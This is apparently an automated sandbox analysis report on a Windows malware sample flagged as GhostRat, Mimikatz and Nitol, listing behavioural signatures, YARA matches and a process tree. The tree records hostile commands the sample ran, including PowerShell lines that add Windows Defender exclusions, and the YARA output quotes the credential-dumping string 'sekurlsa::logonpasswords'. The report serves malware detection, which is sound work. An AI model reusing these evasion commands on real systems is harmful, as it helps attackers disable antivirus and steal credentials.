Edit tour

Windows Analysis Report
[System Process]12.exe

Overview

General Information

Sample name:	[System Process]12.exe
Analysis ID:	1632102
MD5:	7cb5cea873665a41b21e216d01c23087
SHA1:	7329711c865faf018bd1d0446613cfc1020a05b9
SHA256:	0076f6ea4346af5ae43db08205664092029e06bb353e3406ee649e98723182eb
Tags:	exeuser-aachum
Infos:

Detection

GhostRat, Mimikatz, Nitol

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GhostRat

Yara detected Mimikatz

Yara detected Nitol

Adds a directory exclusion to Windows Defender

Contains functionality to detect sleep reduction / modifications

Found API chain indicative of debugger detection

Found evasive API chain (may stop execution after checking mutex)

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Sigma detected: Execution from Suspicious Folder

Sigma detected: Parent in Public Folder Suspicious Process

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Adds / modifies Windows certificates

Checks for available system drives (often done to infect USB drives)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to clear windows event logs (to hide its activities)

Contains functionality to communicate with device drivers

Contains functionality to delete services

Contains functionality to dynamically determine API calls

Contains functionality to enumerate running services

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Communication To Uncommon Destination Ports

Sigma detected: Powershell Defender Exclusion

Too many similar processes found

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

[System Process]12.exe (PID: 7064 cmdline: "C:\Users\user\Desktop\[System Process]12.exe" MD5: 7CB5CEA873665A41B21E216D01C23087)

cmd.exe (PID: 3064 cmdline: cmd /c md C:\Users\Public\Documents\MM MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3692 cmdline: cmd /c md C:\Users\Public\Documents\MM MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

[System Process]12.exe (PID: 5220 cmdline: "C:\Users\user\Desktop\[System Process]12.exe" MD5: 7CB5CEA873665A41B21E216D01C23087)

powershell.exe (PID: 7112 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7680 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\[System Process]12.exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 3392 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7796 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7104 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6760 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4592 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 964 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6456 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4032 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 5024 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4760 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 3828 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 3096 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sppsvc.exe (PID: 3896 cmdline: C:\Windows\system32\sppsvc.exe MD5: 320823F03672CEB82CC3A169989ABD12)

powershell.exe (PID: 760 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7672 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\[System Process]12.exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 5632 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4552 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4296 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 8052 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2752 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6424 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7692 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4104 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 5856 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 5496 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7700 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 1904 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

svchos1.exe (PID: 3508 cmdline: C:\Users\Public\Documents\MM\svchos1.exe MD5: 7CB5CEA873665A41B21E216D01C23087)

svchos1.exe (PID: 7772 cmdline: "C:\Users\Public\Documents\MM\svchos1.exe" MD5: 7CB5CEA873665A41B21E216D01C23087)

powershell.exe (PID: 8092 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6440 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7684 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5232 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
MimiKatz	Varonis summarizes Mimikatz as an open-source application that allows users to view and save authentication credentials like Kerberos tickets. Benjamin Delpy continues to lead Mimikatz developments, so the toolset works with the current release of Windows and includes the most up-to-date attacks.Attackers commonly use Mimikatz to steal credentials and escalate privileges: in most cases, endpoint protection software and anti-virus systems will detect and delete it. Conversely, pentesters use Mimikatz to detect and exploit vulnerabilities in your networks so you can fix them.	APT32 Anunak GALLIUM	http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks http://www.secureworks.com/research/threat-profiles/gold-burlap http://www.secureworks.com/research/threat-profiles/gold-drake	https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz

Name	Description	Attribution	Blogpost URLs	Link
Nitol		No Attribution	https://asec.ahnlab.com/en/44504/ https://blogs.technet.microsoft.com/microsoft_blog/2012/09/13/microsoft-disrupts-the-emerging-nitol-botnet-being-spread-through-an-unsecure-supply-chain/ https://en.wikipedia.org/wiki/Nitol_botnet https://krebsonsecurity.com/tag/nitol/	https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000021.00000002.3893154946.00000000030EC000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
0000001C.00000002.3894160136.00000000037DC000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
0000001C.00000002.3894816354.000000000391B000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
00000021.00000002.3893793680.000000000322B000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
33.2.svchos1.exe.323cd38.5.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0x7b12:$h1: Hid_State 0x7b26:$h2: Hid_StealthMode 0x7b46:$h3: Hid_HideFsDirs 0x7b64:$h4: Hid_HideFsFiles 0x7b84:$h5: Hid_HideRegKeys 0x7ba4:$h6: Hid_HideRegValues 0x7bc8:$h7: Hid_IgnoredImages 0x7bec:$h8: Hid_ProtectedImages 0xc42e:$s1: FLTMGR.SYS 0xc9aa:$s2: HAL.dll 0x954e:$s3: \SystemRoot\System32\csrss.exe 0xad84:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ 0x258:$s5: INIT 0xbe7e:$s6: \hidden-master\Debug\QAssist.pdb
28.2.svchos1.exe.37ed6bc.2.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0x7b12:$h1: Hid_State 0x7b26:$h2: Hid_StealthMode 0x7b46:$h3: Hid_HideFsDirs 0x7b64:$h4: Hid_HideFsFiles 0x7b84:$h5: Hid_HideRegKeys 0x7ba4:$h6: Hid_HideRegValues 0x7bc8:$h7: Hid_IgnoredImages 0x7bec:$h8: Hid_ProtectedImages 0xc42e:$s1: FLTMGR.SYS 0xc9aa:$s2: HAL.dll 0x954e:$s3: \SystemRoot\System32\csrss.exe 0xad84:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ 0x258:$s5: INIT 0xbe7e:$s6: \hidden-master\Debug\QAssist.pdb
28.2.svchos1.exe.392cd38.6.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0x7b12:$h1: Hid_State 0x7b26:$h2: Hid_StealthMode 0x7b46:$h3: Hid_HideFsDirs 0x7b64:$h4: Hid_HideFsFiles 0x7b84:$h5: Hid_HideRegKeys 0x7ba4:$h6: Hid_HideRegValues 0x7bc8:$h7: Hid_IgnoredImages 0x7bec:$h8: Hid_ProtectedImages 0xc42e:$s1: FLTMGR.SYS 0xc9aa:$s2: HAL.dll 0x954e:$s3: \SystemRoot\System32\csrss.exe 0xad84:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ 0x258:$s5: INIT 0xbe7e:$s6: \hidden-master\Debug\QAssist.pdb
33.2.svchos1.exe.30fd6bc.2.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0x7b12:$h1: Hid_State 0x7b26:$h2: Hid_StealthMode 0x7b46:$h3: Hid_HideFsDirs 0x7b64:$h4: Hid_HideFsFiles 0x7b84:$h5: Hid_HideRegKeys 0x7ba4:$h6: Hid_HideRegValues 0x7bc8:$h7: Hid_IgnoredImages 0x7bec:$h8: Hid_ProtectedImages 0xc42e:$s1: FLTMGR.SYS 0xc9aa:$s2: HAL.dll 0x954e:$s3: \SystemRoot\System32\csrss.exe 0xad84:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ 0x258:$s5: INIT 0xbe7e:$s6: \hidden-master\Debug\QAssist.pdb
33.2.svchos1.exe.324c380.4.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0xaa30:$h1: Hid_State 0xaa50:$h2: Hid_StealthMode 0xaa70:$h3: Hid_HideFsDirs 0xaa90:$h4: Hid_HideFsFiles 0xaab0:$h5: Hid_HideRegKeys 0xaad0:$h6: Hid_HideRegValues 0xab00:$h7: Hid_IgnoredImages 0xab30:$h8: Hid_ProtectedImages 0xfb5a:$s1: FLTMGR.SYS 0xc6b0:$s3: \SystemRoot\System32\csrss.exe 0xe080:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
28.2.svchos1.exe.37fcd04.4.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0xaa30:$h1: Hid_State 0xaa50:$h2: Hid_StealthMode 0xaa70:$h3: Hid_HideFsDirs 0xaa90:$h4: Hid_HideFsFiles 0xaab0:$h5: Hid_HideRegKeys 0xaad0:$h6: Hid_HideRegValues 0xab00:$h7: Hid_IgnoredImages 0xab30:$h8: Hid_ProtectedImages 0xfb5a:$s1: FLTMGR.SYS 0xc6b0:$s3: \SystemRoot\System32\csrss.exe 0xe080:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
28.2.svchos1.exe.393c380.5.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0xaa30:$h1: Hid_State 0xaa50:$h2: Hid_StealthMode 0xaa70:$h3: Hid_HideFsDirs 0xaa90:$h4: Hid_HideFsFiles 0xaab0:$h5: Hid_HideRegKeys 0xaad0:$h6: Hid_HideRegValues 0xab00:$h7: Hid_IgnoredImages 0xab30:$h8: Hid_ProtectedImages 0xfb5a:$s1: FLTMGR.SYS 0xc6b0:$s3: \SystemRoot\System32\csrss.exe 0xe080:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
28.2.svchos1.exe.37ed6bc.2.raw.unpack	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
28.2.svchos1.exe.37ed6bc.2.raw.unpack	GhostDragon_Gh0stRAT	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0x24108:$x4: Http/1.1 403 Forbidden 0x24108:$s5: Http/1.1 403 Forbidden
28.2.svchos1.exe.37ed6bc.2.raw.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x240bf:$x1: sekurlsa::logonpasswords
28.2.svchos1.exe.37ed6bc.2.raw.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0x8712:$h1: Hid_State 0x1ac78:$h1: Hid_State 0x8726:$h2: Hid_StealthMode 0x1ac98:$h2: Hid_StealthMode 0x8746:$h3: Hid_HideFsDirs 0x1acb8:$h3: Hid_HideFsDirs 0x8764:$h4: Hid_HideFsFiles 0x1acd8:$h4: Hid_HideFsFiles 0x8784:$h5: Hid_HideRegKeys 0x1acf8:$h5: Hid_HideRegKeys 0x87a4:$h6: Hid_HideRegValues 0x1ad18:$h6: Hid_HideRegValues 0x87c8:$h7: Hid_IgnoredImages 0x1ad48:$h7: Hid_IgnoredImages 0x87ec:$h8: Hid_ProtectedImages 0x1ad78:$h8: Hid_ProtectedImages 0xd02e:$s1: FLTMGR.SYS 0x209a2:$s1: FLTMGR.SYS 0xd5aa:$s2: HAL.dll 0xa14e:$s3: \SystemRoot\System32\csrss.exe 0x1c8f8:$s3: \SystemRoot\System32\csrss.exe
33.2.svchos1.exe.310cd04.1.raw.unpack	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
33.2.svchos1.exe.310cd04.1.raw.unpack	GhostDragon_Gh0stRAT	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0x14ac0:$x4: Http/1.1 403 Forbidden 0x14ac0:$s5: Http/1.1 403 Forbidden
33.2.svchos1.exe.310cd04.1.raw.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x14a77:$x1: sekurlsa::logonpasswords
33.2.svchos1.exe.310cd04.1.raw.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0xb630:$h1: Hid_State 0xb650:$h2: Hid_StealthMode 0xb670:$h3: Hid_HideFsDirs 0xb690:$h4: Hid_HideFsFiles 0xb6b0:$h5: Hid_HideRegKeys 0xb6d0:$h6: Hid_HideRegValues 0xb700:$h7: Hid_IgnoredImages 0xb730:$h8: Hid_ProtectedImages 0x1135a:$s1: FLTMGR.SYS 0xd2b0:$s3: \SystemRoot\System32\csrss.exe 0xec80:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
33.2.svchos1.exe.323cd38.5.raw.unpack	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
33.2.svchos1.exe.323cd38.5.raw.unpack	GhostDragon_Gh0stRAT	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0x24108:$x4: Http/1.1 403 Forbidden 0x24108:$s5: Http/1.1 403 Forbidden
33.2.svchos1.exe.323cd38.5.raw.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x240bf:$x1: sekurlsa::logonpasswords
33.2.svchos1.exe.323cd38.5.raw.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0x8712:$h1: Hid_State 0x1ac78:$h1: Hid_State 0x8726:$h2: Hid_StealthMode 0x1ac98:$h2: Hid_StealthMode 0x8746:$h3: Hid_HideFsDirs 0x1acb8:$h3: Hid_HideFsDirs 0x8764:$h4: Hid_HideFsFiles 0x1acd8:$h4: Hid_HideFsFiles 0x8784:$h5: Hid_HideRegKeys 0x1acf8:$h5: Hid_HideRegKeys 0x87a4:$h6: Hid_HideRegValues 0x1ad18:$h6: Hid_HideRegValues 0x87c8:$h7: Hid_IgnoredImages 0x1ad48:$h7: Hid_IgnoredImages 0x87ec:$h8: Hid_ProtectedImages 0x1ad78:$h8: Hid_ProtectedImages 0xd02e:$s1: FLTMGR.SYS 0x209a2:$s1: FLTMGR.SYS 0xd5aa:$s2: HAL.dll 0xa14e:$s3: \SystemRoot\System32\csrss.exe 0x1c8f8:$s3: \SystemRoot\System32\csrss.exe
33.2.svchos1.exe.324c380.4.raw.unpack	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
33.2.svchos1.exe.324c380.4.raw.unpack	GhostDragon_Gh0stRAT	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0x14ac0:$x4: Http/1.1 403 Forbidden 0x14ac0:$s5: Http/1.1 403 Forbidden
33.2.svchos1.exe.324c380.4.raw.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x14a77:$x1: sekurlsa::logonpasswords
33.2.svchos1.exe.324c380.4.raw.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0xb630:$h1: Hid_State 0xb650:$h2: Hid_StealthMode 0xb670:$h3: Hid_HideFsDirs 0xb690:$h4: Hid_HideFsFiles 0xb6b0:$h5: Hid_HideRegKeys 0xb6d0:$h6: Hid_HideRegValues 0xb700:$h7: Hid_IgnoredImages 0xb730:$h8: Hid_ProtectedImages 0x1135a:$s1: FLTMGR.SYS 0xd2b0:$s3: \SystemRoot\System32\csrss.exe 0xec80:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
28.2.svchos1.exe.393c380.5.raw.unpack	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
28.2.svchos1.exe.393c380.5.raw.unpack	GhostDragon_Gh0stRAT	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0x14ac0:$x4: Http/1.1 403 Forbidden 0x14ac0:$s5: Http/1.1 403 Forbidden
28.2.svchos1.exe.393c380.5.raw.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x14a77:$x1: sekurlsa::logonpasswords
28.2.svchos1.exe.393c380.5.raw.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0xb630:$h1: Hid_State 0xb650:$h2: Hid_StealthMode 0xb670:$h3: Hid_HideFsDirs 0xb690:$h4: Hid_HideFsFiles 0xb6b0:$h5: Hid_HideRegKeys 0xb6d0:$h6: Hid_HideRegValues 0xb700:$h7: Hid_IgnoredImages 0xb730:$h8: Hid_ProtectedImages 0x1135a:$s1: FLTMGR.SYS 0xd2b0:$s3: \SystemRoot\System32\csrss.exe 0xec80:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
28.2.svchos1.exe.37fcd04.4.raw.unpack	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
28.2.svchos1.exe.37fcd04.4.raw.unpack	GhostDragon_Gh0stRAT	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0x14ac0:$x4: Http/1.1 403 Forbidden 0x14ac0:$s5: Http/1.1 403 Forbidden
28.2.svchos1.exe.37fcd04.4.raw.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x14a77:$x1: sekurlsa::logonpasswords
28.2.svchos1.exe.37fcd04.4.raw.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0xb630:$h1: Hid_State 0xb650:$h2: Hid_StealthMode 0xb670:$h3: Hid_HideFsDirs 0xb690:$h4: Hid_HideFsFiles 0xb6b0:$h5: Hid_HideRegKeys 0xb6d0:$h6: Hid_HideRegValues 0xb700:$h7: Hid_IgnoredImages 0xb730:$h8: Hid_ProtectedImages 0x1135a:$s1: FLTMGR.SYS 0xd2b0:$s3: \SystemRoot\System32\csrss.exe 0xec80:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
33.2.svchos1.exe.310cd04.1.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0xaa30:$h1: Hid_State 0xaa50:$h2: Hid_StealthMode 0xaa70:$h3: Hid_HideFsDirs 0xaa90:$h4: Hid_HideFsFiles 0xaab0:$h5: Hid_HideRegKeys 0xaad0:$h6: Hid_HideRegValues 0xab00:$h7: Hid_IgnoredImages 0xab30:$h8: Hid_ProtectedImages 0xfb5a:$s1: FLTMGR.SYS 0xc6b0:$s3: \SystemRoot\System32\csrss.exe 0xe080:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
33.2.svchos1.exe.30fd6bc.2.raw.unpack	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
